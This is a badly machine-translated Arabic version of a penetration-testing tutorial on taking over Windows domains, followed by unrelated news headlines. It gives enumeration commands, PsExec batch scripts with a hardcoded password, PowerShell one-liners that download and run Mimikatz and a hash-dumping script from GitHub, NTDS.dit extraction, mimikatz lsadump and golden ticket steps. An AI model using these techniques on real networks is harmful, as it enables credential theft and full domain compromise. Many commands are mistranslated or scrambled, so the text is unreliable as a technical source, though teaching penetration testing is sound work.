جافة! نطاق شبكة اختبار الاختراق الاختراق مفصل! جمع!

في عملية اختبار الاختراق، ونحن غالبا ما تواجه السيناريوهات التالية: ملقم في مجال التوجيه من خلال تعيين منفذ، وتوفير خدمات الإنترنت، وحصلنا على إذن من الجهاز المضيف من خلال ضعف البرمجة على شبكة الإنترنت، إذا كان هناك مزيد من الحزب متطلبات اختبار الاختراق شبكة لإثبات مخاطر هائلة التي تواجهها المنشآت، وهذه المرة على أرض الملعب يجب القيام به في اختراق الشبكة.

بشكل عام، نحن الحصول على الحق في وحدة تحكم مجال هو الهدف، لأنه بمجرد سقوط تحكم المجال، على العموم تحت السيطرة في الشبكة، قبل تعلم اختراق المجال، ونحن بحاجة إلى فهم بعض المعارف الأساسية، هذه القضية "، والفصول الدراسية ليونارد "تشين المعلم ISEC مختبر لشرح ذلك للجميع.

أولا، ما هو المجال

الشبكة على التنظيم المنطقي للعديد من أجهزة الكمبيوتر معا، وإدارة مركزية ومنطقية هذه البيئة تختلف من الفريق العامل دعا المجال، وحدة إدارة المجال هو جوهر التنظيم والموارد التخزين في المجال، وحدة تحكم مجال واحد على الأقل، وحدة تحكم المجال يحمل حساب المستخدم وقاعدة بيانات الأمان للمجال بأكمله.

الشكل (1)

ثم بنية الشبكة نطاق ما هي مزايا من ذلك؟ والميزة الرئيسية لالحقول في المجالات التالية:

1، وإدارة حقوق مركزية نسبيا، وخفض تكاليف الإدارة

بيئة مجال الحفاظ على جميع موارد الشبكة، بما في ذلك المستخدم على وحدة تحكم المجال للإدارة المركزية، طالما تسجيل جميع المستخدمين الدخول إلى مجال، المجال يمكن مصادقة، ومديري يمكن تحسين إدارة موارد الكمبيوتر، يتم تخفيض تكلفة إدارة الشبكة بشكل كبير، وفي الوقت نفسه في بيئة المجال يمكن أيضا منع الموظفين البرمجيات غير القانونية المثبتة على المضيفين عضو المجال، وتعزيز الأمن العميل، والحد من فشل العميل، والحد من تكاليف الصيانة.

2، لتعزيز السرية

تساعد على إدارة بعض المعلومات السرية للمؤسسة يمكن أن يكون فرديا التحكم في الوصول الموارد، للسماح أو رفض طلبات حساب مجال محددة للموارد.

3، وتعزيز الأمن

استخدام إعادة توجيه المجلد وحسابات التجوال، والحسابات الشخصية من وثائق وبيانات العمل يمكن تخزينها على الخادم، توحيد النسخ الاحتياطي وإدارة، بحيث بيانات المستخدم هو أكثر آمنة وتأمين، في حين أن وحدة تحكم المجال توزيع التطبيقات، والبقع النظام، يمكن للمستخدم اختيار لتثبيت، يمكن تثبيت تعيين تلقائيا من قبل مسؤول النظام، وتحسين أمن البيانات النظام إلى حد كبير.

4، وتحسين الراحة

يكلف بها من قبل تعيينات النصي لتسجيل الدخول المسؤول، بعد تسجيل دخول المستخدم يمكن استخدام مثل حرف محرك الأقراص المحلي، واستخدام الموارد على شبكة الاتصال، دون الحاجة إلى إدخال كلمة المرور مرة أخرى.

لهذه الأسباب، فإن العديد من الشركات تعتمد البيئات نطاق الشبكة الداخلية، وذلك لاختبار اختراق المؤهلة، والتفكير التقليدي والتقنيات اللازمة لإتقان مجال الاختراق.

الثانية، وخصائص الحقل

الكمبيوتر عضو المجال عند تسجيل الدخول إلى المجال أو يمكن أن تختار لتسجيل الدخول إلى هذا الكمبيوتر، بتسجيل الدخول إلى المجال عند المصادقة على استخدام بروتوكول Kerberos على وحدة تحكم مجال تسجيل الدخول إلى هذه المصادقة NTLM الكمبيوتر التي تقوم بها SAM كما هو موضح أدناه:

الشكل 2

افتراضيا، يمكن للمستخدم تسجيل الدخول إلى المجال من جميع المحطات في المجال، لم يتم تضمين وحدة تحكم المجال، يمكن للمسؤول تحديد كمبيوتر معين، يتم تخزين معلومات المجال المستخدم في Active Directory، في الرسم البياني التالي:

الشكل (3)

ثالثا، فكرة مجال الاختراق

وهناك أعمال من حجم معين، هم موظفون من المرجح أن تواجه دخول وخروج كل يوم، وبالتالي فإن أعضاء المجال إدارة الشبكة غالبا ما تحتاج إلى القضاء على ملف القرص شكل المضيف، ومن ثم إعادة تثبيت برنامج نظام الواجب تقديمها للموظفين الجدد، وبالتالي، من أجل تسهيل نقل هذا الأخير، فإن معظم مسؤولي الشبكة القيام القرص صورة النظام، توحيد تثبيت كافة أجهزة الكمبيوتر، ومجموعة في الوقت المعتاد من التثبيت، وحتى توحيد كلمة المرور.

ولذلك، فإن حساب مسؤول مجال الكمبيوتر المحلي، هو جهاز الكمبيوتر الخاص بك من المرجح أن تكون قادرة على الدخول في العديد من المجالات، واحتمال كلمة مرور المسؤول المحلي في أواخر التغييرات الخادم، والكثير خفض من احتمال على الكمبيوتر المكتبية الشخصية، ومستخدم مجال أذونات منخفضة، لا يمكن تثبيت البرنامج على المضيفين عضو المجال، والتي سوف تحدث في المشهد التالي:

يحتاج المستخدمون إلى استخدام البرمجيات VISO المجال لرسم العمليات، ثم اتصل بمسؤول الشبكة للتثبيت، ومديري الشبكة تسجيل الدخول باستخدام مسؤول المجال، ويستضيف عضو المجال، ومساعدة لهم تثبيت البرنامج VISO، بحيث الموظفين القائم على الحاسوب، تسجيل الدخول إلى التحول إلى المسؤول عن الكمبيوتر المحلي، بعد أداء mimikatz، والاستيلاء على كلمة مرور مسؤول المجال من ذاكرة منهم، بنجاح السيطرة على المجال بالكامل.

ولذلك، فإن فكرة اختراق المجال هو: من قبل عضو في المجال المضيفة، تحديد حساب وحدة تحكم المجال IP ومسؤول المجال، وذلك باستخدام مجموعة كنقطة انطلاق عضو مجال لتوسيع نطاق واستخدام مسؤول المجال يمكن تسجيل خصائص أي عضو في المجال المضيف، تحديد موقع هبطت مسؤول المجال المضيف IP، وتمكنت من عضو مجال تفريغ الذاكرة المضيف كلمة مرور مسؤول المجال، ثم سجل وحدة تحكم مجال اختراق الشبكة بالكامل.

رابعا، اختراق مجال التعليم المشترك

يتم تنفيذ نتائج جميع الإرشادات التالية على عضو مجال المضيف.

حصلت وحدات تحكم المجال IP: dsquery الخادم

الشكل (4)

وحدة تحكم المجال للحصول على اسم المضيف: صافي مجموعة "وحدات تحكم المجال" / نطاق، والاهتمام يكون أكثر وراء اسم الجهاز $ رمز التي حصل عليها تعليمات، على النحو التالي:

الرقم 5

الاستعلام إدارة المستخدم المجال: صافي مجموعة "إدارة المجال" / نطاق

6

رؤية جميع المستخدمين المجال: صافي المستخدم / نطاق

الرقم 7

هناك مستخدم خاص، ودعا KRBTGT، يتم استخدام حساب المستخدم للمصادقة Kerberos، والوصول إلى تجزئة المستخدم، يمكنك صدرت فواتير وهمية فواتير لمهاجمة، وبالإضافة إلى ذلك، هناك العديد من الأوامر الشائعة:

تسجيل الدخول إلى الاستعلام عن المجال الحالي: صافي محطة التكوين

يستعلم نهج كلمة المرور المجال: صافي حسابات / نطاق

عرض معلومات التصحيح: QFE WMIC

تحقق التشغيل نوع النظام: نظام التشغيل WMIC

عندما نحصل على إذن من حساب مسؤول محلي، ونحن نريد في أن الوصول إلى حساب المضيفين الشبكة الأخرى، ممارسة شائعة لديه صافي استخدام التصنيف الدولي للبراءات $ تأسيس اتصال، اتصال أمر WMIC، وذلك باستخدام RDP متصلة، بالطبع، يمكنك استخدام "الكمبيوتر إدارة - يتم توصيل إلى كمبيوتر آخر "ميزة للعمل، بالإضافة إلى ذلك، لكنني أفضل لاستخدام اتصال بعيد psexec، كما هو مبين أدناه:

الرقم 8

إذا كنت تشعر اتصال من يدوي الكثير من المتاعب، يمكنك دفعة أيضا ربط، دفعة cmdshell ترتد إلى الوراء، يمكنك استخدام الدفعة التالية:

echo إيقاف

صدى تحقق الملكية الفكرية ADDR التكوين ملف ...

إن لم يكن موجودا ip.txt صدى الملكية الفكرية ADDR التكوين ملف ip.txt لا وجود له! وغوتو نهاية

صدى قراءة وتحليل ملف ...

ل/ F "موسوعة الحياة = #" أنا في (ip.txt) لم تبدأ PsExec.exe \ ط -accepteula -u -p المسؤول "123456" كمد وبدء كمد / ج PsExec.exe \ ط -u -p المسؤول "123456" كمد

: نهاية

خروج

الرقم 9

عند العودة إلى cmdshell، يمكننا أن نقرأ ذاكرة واحدا تلو الآخر، للاستيلاء على كلمة المرور مسؤول المجال، حيث يمكنك الجمع بين بوويرشيل لعملية سريعة بدون تحميل الملفات:

الصيد عادي:

بوويرشيل IEX (نيو-كائن Net.WebClient) .DownloadString ( 'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')؛ -DumpCerts استدعاء-Mimikatz

الصيد التجزئة:

بوويرشيل IEX (نيو-كائن Net.WebClient) .DownloadString ( 'https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1')؛ GET-PassHashes

وميزة هذا النهج هو أنه طالما سقط مسؤول المجال على الكمبيوتر الهدف، تسجيل الخروج من جلسة الرغم من ذلك، كما يمكن قراءة من الذاكرة لكلمة السر، ولكن عملية الاختراق الفعلية، ونحن غالبا ما يبحثون عن الكفاءة، وكيفية العثور بسرعة على تسجيل الدخول مسؤول المجال من خلالها الكمبيوتر، وهناك أيضا نشط أولوية أعلى الدورة، يمكننا استخدام الأمر التالي:

10

هنا مطلوب ip.txt لاجتياز قائمة IP، 1.bat التعليمات تاسكليست / ت | العثور على "إدارة المجال"، لذلك نحن بحاجة فقط لcmdshell العائد بين الدورة لمعرفة ما اذا كان يحتوي على كلمات مسؤول المجال، إذا كان الأمر كذلك، فهذا يعني أن المضيف كان سقط مسؤول المجال، يمكنك الذهاب إلى تفريغ كلمة السر الذاكرة.

وبالإضافة إلى ذلك، يمكننا أيضا استخدام الأمر تاسكليست لعرض المضيف البعيد قائمة المهام، والمهمة هنا هي نفس قائمة كلمات البحث تحتوي على مسؤول المجال، على النحو التالي:

11

واستنادا إلى مبدأ أعلاه، يمكننا إرسال دفعة أكثر الآلي:

echo إيقاف

صدى تحقق الملكية الفكرية ADDR التكوين ملف ...

إن لم يكن موجودا ip.txt صدى الملكية الفكرية ADDR التكوين ملف ip.txt لا وجود له! وغوتو نهاية

صدى قراءة وتحليل ملف ...

ل/ F "موسوعة الحياة = #" أنا في (ip.txt) القيام صدى أنا و(صدى أنا وتاسكليست / ق ط / ش المسؤول / ص mytest2010 / ت) > > د: \ result.txt

: نهاية

خروج

دور الأمر إلى استخدام اسم المستخدم المحدد وكلمة مرور لاجتياز ip.txt قائمة IP، وقائمة مهام الطباعة، وإخراج نتيجة لresult.txt التي، على تنفيذ الدفعة المذكورة أعلاه، نحن بحاجة فقط إلى الانتظار لفترة من الوقت، وأخيرا إلى لمعرفة ما إذا كان يحتوي على result.txt مسؤول المجال بين الكلمات، وهناك جلسة عمل نشطة على مسؤول المجال لتحديد أي المضيفين، كما هو مبين أدناه:

12

خامسا، استخراج التجزئة مستخدم المجال

حساب المستخدم المجال في شكل قاعدة بيانات نطاق المخزنة في Active Directory، هو المساعدة Ntdsutil.exe وحدة تحكم المجال الذي يأتي مع أدوات إدارة قواعد البيانات المجال من النوافذ ويأتي 2008 الافتراضي على، حتى نتمكن من تمرير قاعدة البيانات نطاق واستخراج كافة المجالات معلومات المجال المستخدم، تنفيذ بالتتابع الأوامر التالية على وحدة تحكم المجال، مستمدة من قاعدة بيانات المجال:

المساعدة Ntdsutil -snapshot تنشيط NTDS إنشاء جبل المثال {GUID} -نسخة نقطة تحميل \ ويندوز \ NTDS \ NTDS.DIT د: \ ntds_save.dit

13

قاعدة بيانات المجال تحميلها، يمكن استنساخها، كما هو مبين أدناه:

14

وأخيرا يقوم إلغاء تحميل {GUID} -delete {GUID} يمكن حذف نقطة تحميل -quit، لتجنب الكشف، ومن ثم تحميل أداة QuarksPwDump على وحدة تحكم المجال، ثم تنفيذ الأوامر التالية، المستخدم بنجاح استخراج تجزئة، كما هو مبين أدناه:

QuarksPwDump تفريغ-تجزئة المجال -ntds ملف د: \ ntds_save.dit

15

علما بأن عمليات المذكورة أعلاه يجب أن يكون على وحدة تحكم مجال، يحدث الخطأ التالي، لأن الحاجة قاعدة بيانات مجال مفتوح لاستخدام محرك قاعدة البيانات المناسبة، كما هو مبين أدناه:

16

بالإضافة إلى الأسلوب أعلاه من العملية، ويمكن أيضا أن تستخدم mimikatz أمر للحصول على تجزئة كافة المستخدمين على وحدة تحكم المجال:

mimikatz تسجيل "امتياز :: التصحيح" "lsadump :: LSA / التصحيح"

17

سادسا: الموافقة على مشروع القانون الهجوم

وتتكون كل مجال المستخدم كلمة السر تجزئة KRBTGT تذكرة لحساب ولدت، لذلك طالما حصلنا على KRBTGT كلمة المرور تجزئة، أنت حر في صياغة التذاكر، الهبوط تذكرة ومن ثم استخدام وحدة تحكم المجال، وذلك باستخدام قانون KRBTGT التجزئة المقدم من المستخدمين ويسمى تذكرة الذهبي، كما هو معروف هذا الأسلوب الهجوم بأنه هجوم فاتورة عابرة.

أولا، لدينا لتوليد التذكرة الذهبية، وهنا تحتاج إلى تعديل حساب المسؤول المجال المناسب، اسم النطاق، وقيمة معاوية، كما هو مبين أدناه:

18

ثم نستخدم الأمر التالي لملاحظات الاستيراد:

19

بعد الاستيراد ناجحا، ونحن أداء في مجال تستضيف عضوا klist، يمكنك عرض الملاحظات مؤقتا، على النحو التالي:

الرقم 20

وأخيرا، يمكننا استخدام الهجوم تمرير مشروع القانون، وتهبط وحدة تحكم مجال، كما هو مبين أدناه:

الرقم 21

لذلك، إذا وجدت تم تغيير عملية تسلل نطاق كلمة المرور مسؤول المجال، يمكنك محاولة استخدام المستخدمين التجزئة KRBTGT التاريخي لمشاريع القوانين الهجوم، كلمة مرور المستخدم KRBTGT هي عموما ليست شخص إلى تعديل.

بالإضافة إلى ذلك، فإن عملية تسلل نطاق يمكن أن تستخدم لMS14-068 الضعف، نظرا التصحيح مايكروسوفت هو kb3011780، أكثر من 2000 الخادم وحدة تحكم المجال، إذا لم يلعب هذا التصحيح، ثم الوضع سوف تكون فقيرة نسبيا، ويمكن استغلال الثغرة الأمنية يذكر أي حق مستخدم مجال امتيازات مسؤول المجال، ضررا كبيرا.

الكاتب: آن شيامن الشبكة والتكنولوجيا المحدودة نقلا عن: freebuf.com

يؤدي هواوي إلى الأعلى "تعترف المشورة"؟ سيتم تخفيض رسوم براءات الاختراع ارتفاع بأكثر من النصف، أو

من هو رياضي العضلات الحقيقي؟ جرد الوادي بناء أفضل إله الذكور!

سيتم اطلاق سراح نا زهي جي الصغيرة SUV أو اتخاذ 1.6T 19 أبريل

أبل أكبر عملية استحواذ من أي وقت مضى الموظفين الميلاد: 600،000،000 $ الصفقة، حوار 300 مهندس للانضمام

وقال ديب زوجته السابقة ثائق المحكمة القضية الجمهور له، ورجل متهم بالعنف المنزلي خطر المرأة من كسر إصبع

يتوهم نقل العودة الكاملة من الدم، ووضع بيغ جو تكتيكات عجلات

وقال صافي الظلام X وهذا ما يسمى "شبكة المظلم" للفيلم الوثائقي!

SUV العلامة التجارية الأولى! سفر التكوين GV80 مفهوم السيارة أفرجت

فيلم "أسد شرسة عنيفة" لاحظ النهائي من الناس التعرض الأسد قام المواجهة بين الحياة والموت المعركة

دبابات بطل النقيض من ذلك، والأبيض من مداخن Yaojin

بناء Metasploit WAR لا يتم الكشف عن

الثقيلة! أصدرت وزارة التربية والتعليم قائمة محدثة من معظم الجامعات شاملة